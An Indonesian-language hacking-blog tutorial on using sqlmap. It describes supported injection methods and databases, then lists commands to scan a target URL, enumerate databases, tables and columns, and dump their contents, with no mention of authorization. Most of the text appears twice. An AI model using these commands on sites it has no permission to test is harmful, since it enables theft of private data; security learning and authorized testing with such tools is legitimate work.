Asslamu'alaikum Warahmatullahi Wabarakatuh
Kali ini BinusHacker akan berbagi bagaimana melakukan penetration testing dengan menggunakan SQLMap (Tools SQL Injection & Takeover)
Yang perlu dipersiapkan:
1. Tools SQL MAP
2. PC / Server yang sudah ter-install python
3. Target yang memiliki vulnerability SQL Injection
DOWNLOAD SQLMAP DI LINK BERIKUT
http://sqlmap.org/
Kelebihan menggunakan SQL Map:
1. Bisa melakukan SQL Injection dengen beberapa method seperti:
– Boolean-Based Blind SQL Injection
– Time-Based Blind SQL Injection
– Error-Based SQL Injection
– UNION Query SQL Injection
– Stacked Query SQL Injection
2. Bisa berjalan baik untuk beberapa jenis database seperti:
– MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase & SAP MaxDB
Oke langsung praktek saja, kita akan mencoba untuk melakukan “Fingerprinting Database & Kelemahan SQL” pada sebuah website target.
tools ini adalah tools yang berbasis program python, jadi untuk menjalankanya kita harus menginstall program python. kalau kamu pengguna linux kamu tidak usah repot-repot untuk menginstall python karena di linux sudah ada. tapi kalau kamu pengguna windows, kamu harus menginstall program python terlebih dahulu.
download python :
Windows x86 MSI Installer (2.7.3) untuk windows x86/32 bit
Windows X86-64 MSI Installer (2.7.3) untuk windows 64 bit
Mac OS X 64-bit/32-bit x86-64/i386 Installer (2.7.3) untuk MAC OS X 10.6/10.7
www.python.org/ftp/python/2.7.3/python-2.7.3-macosx10.3.dmg untuk MAC OS 10.3 - 10.6
Berikut adalah beberapa command penting di SQLMAP
Untuk melakukan scanning terhadap Target [URL]
./sqlmap.py -u[url]
Untuk mendapatkan informasi database Target [URL]
./sqlmap.py -u[url] –dbs
Untuk mendapatkan informasi table di database Target [URL]
./sqlmap.py -u [url] –tables -D [database]
Untuk mendapatkan informasi kolom didalam table yang ada didatabase Target [URL]
./sqlmap.py -u [url] –columns -T [table name] -D [databasename]
Untuk melakukan dump kolom, table dan database Target [URL]
./sqlmap.py -u [url] –dump –columns -T [table name] -D [databasename]
Untuk melakukan dump spesifik kolom Target [URL]
./sqlmap.py -u [url] –dump -C [column name] -T [table name] -D [database name]
1. Tools SQL MAP
2. PC / Server yang sudah ter-install python
3. Target yang memiliki vulnerability SQL Injection
DOWNLOAD SQLMAP DI LINK BERIKUT
http://sqlmap.org/
Kelebihan menggunakan SQL Map:
1. Bisa melakukan SQL Injection dengen beberapa method seperti:
– Boolean-Based Blind SQL Injection
– Time-Based Blind SQL Injection
– Error-Based SQL Injection
– UNION Query SQL Injection
– Stacked Query SQL Injection
2. Bisa berjalan baik untuk beberapa jenis database seperti:
– MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase & SAP MaxDB
Oke langsung praktek saja, kita akan mencoba untuk melakukan “Fingerprinting Database & Kelemahan SQL” pada sebuah website target.
tools ini adalah tools yang berbasis program python, jadi untuk menjalankanya kita harus menginstall program python. kalau kamu pengguna linux kamu tidak usah repot-repot untuk menginstall python karena di linux sudah ada. tapi kalau kamu pengguna windows, kamu harus menginstall program python terlebih dahulu.
download python :
Windows x86 MSI Installer (2.7.3) untuk windows x86/32 bit
Windows X86-64 MSI Installer (2.7.3) untuk windows 64 bit
Mac OS X 64-bit/32-bit x86-64/i386 Installer (2.7.3) untuk MAC OS X 10.6/10.7
www.python.org/ftp/python/2.7.3/python-2.7.3-macosx10.3.dmg untuk MAC OS 10.3 - 10.6
Berikut adalah beberapa command penting di SQLMAP
Untuk melakukan scanning terhadap Target [URL]
./sqlmap.py -u[url]
Untuk mendapatkan informasi database Target [URL]
./sqlmap.py -u[url] –dbs
Untuk mendapatkan informasi table di database Target [URL]
./sqlmap.py -u [url] –tables -D [database]
Untuk mendapatkan informasi kolom didalam table yang ada didatabase Target [URL]
./sqlmap.py -u [url] –columns -T [table name] -D [databasename]
Untuk melakukan dump kolom, table dan database Target [URL]
./sqlmap.py -u [url] –dump –columns -T [table name] -D [databasename]
Untuk melakukan dump spesifik kolom Target [URL]
./sqlmap.py -u [url] –dump -C [column name] -T [table name] -D [database name]
